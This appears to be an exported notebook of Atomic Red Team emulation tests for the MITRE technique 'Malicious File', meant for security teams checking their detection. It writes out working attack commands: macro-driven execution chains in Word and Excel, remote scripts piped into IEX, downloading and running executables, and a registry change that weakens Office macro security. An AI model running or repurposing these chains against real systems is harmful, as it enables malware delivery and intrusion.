# T1204.002 - Malicious File
An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) 

While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

## Atomic Tests

### Atomic Test #1 - OSTap Style Macro Execution
This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
References:
  https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"C:\Users\Public\art.jse`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe C:\Users\Public\art.jse`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 1

#### Cleanup: 
```powershell
Remove-Item C:\Users\Public\art.jse -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 1 -Cleanup

### Atomic Test #2 - OSTap Payload DownloadUses cscript //E:jscript to download a file
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
echo var url = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > %TEMP%\OSTapGet.js
cscript //E:Jscript %TEMP%\OSTapGet.js
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 2

#### Cleanup: 
```cmd
del %TEMP%\OSTapGet.js /F /Q >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Maldoc choice flags command execution
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched.
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 3

### Atomic Test #4 - OSTAP JS version
Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"C:\Users\Public\art.jse`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript C:\Users\Public\art.jse`", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 4

### Atomic Test #5 - Office launching .bat file from AppData
Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"$("$env:temp\art1204.bat")`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct Word
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 5

### Atomic Test #6 - Excel 4 Macro
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.

A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
with Excel matches that of the local system. This username can be found under Files -> Options -> Username

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Excel must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Excel.Application" | Out-Null
  Stop-Process -Name "Excel"
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
  Remove-Item $fname
  Remove-Item $fname1
}

$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()

if ("$env:Username" -ne "") {
  $sheet.Cells.Item(1,1) = "$env:Username"
} else {
  $sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}

$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"https://live.sysinternals.com/procexp.exe`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()

[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()

Remove-Variable xlBook
Remove-Variable xlApp
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 6

#### Cleanup: 
```powershell
Stop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 6 -Cleanup

### Atomic Test #7 - Headless Chrome code execution via VBA
This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local
webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver
and pull down the script and execute it. By default the payload will execute calc.exe on the system.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Word must be installed

##### Check Prereq Commands:
```powershell
try {
  $wdApp = New-Object -COMObject "Word.Application"
  Stop-Process -Name "winword"
  exit 0 } catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```
##### Description: Google Chrome must be installed

##### Check Prereq Commands:
```powershell
try {
  $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Google Chrome manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 7

#### Cleanup: 
```powershell
Stop-Process -name mshta
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 7 -Cleanup

### Atomic Test #8 - Potentially Unwanted Applications (PUA)The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe
& "$env:TEMP/PotentiallyUnwanted.exe"
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 8

#### Cleanup: 
```powershell
Stop-Process -name PotentiallyUnwanted
Remove-Item $env:TEMP/PotentiallyUnwanted.exe -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 8 -Cleanup

### Atomic Test #9 - Office Generic Payload Download
This Test uses a VBA macro to launch Powershell which will download a file from a user defined web server.
Required input agruments are c2_domain and file_name
Execution is handled by [Invoke-MalDoc](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
Example for c2 server located at 127.0.0.1 for the file test.txt which is nested below the parent directory in the tests/my-test folder
Example input args for file in root directory c2-domain = 127.0.0.1, file-name = test.txt

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Destination c2_domain name or IP address must be set to a running HTTP server.

##### Check Prereq Commands:
```powershell
if (None) (exit 0) else (exit 1)

```
##### Get Prereq Commands:
```powershell
Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service"

```
##### Description: Microsoftt #{ms_product} must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 9 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macroCode = Get-Content "PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt" -Raw
$URL = "None" + "/" + ""
$macroCode = $macroCode -replace 'serverPath', $URL -replace 'fileName', "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/test9-example-payload.txt"
Invoke-MalDoc -macroCode $macroCode -officeProduct "Word"
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 9

#### Cleanup: 
```powershell
Remove-Item "C:\Users\$env:username\Desktop\https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/test9-example-payload.txt" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 9 -Cleanup

### Atomic Test #10 - LNK Payload DownloadThis lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
$file1 = "$env:Temp\test10.lnk"
Start-Process $file1
Start-Sleep -s 10
taskkill /IM a.exe /F
```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 10

#### Cleanup: 
```powershell
$file1 = "$env:Temp\test10.lnk"
$file2 = "$env:Temp\a.exe"
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 10 -Cleanup

### Atomic Test #11 - Mirror Blast EmulationEmulates the JS -> MSI chain of the MirrorBlast T505 campaign by executing an xlsm file designed. 
Requires the 32 bit version of Office to run. [MirrorBlast Campaign Analysis](https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies)
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
Cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force | Out-Null
& '.\Excel 2016.lnk' "PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm"```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 11

#### Cleanup: 
```powershell
reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f```

In [ ]:
Invoke-AtomicTest T1204.002 -TestNumbers 11 -Cleanup

## Detection
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.

Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).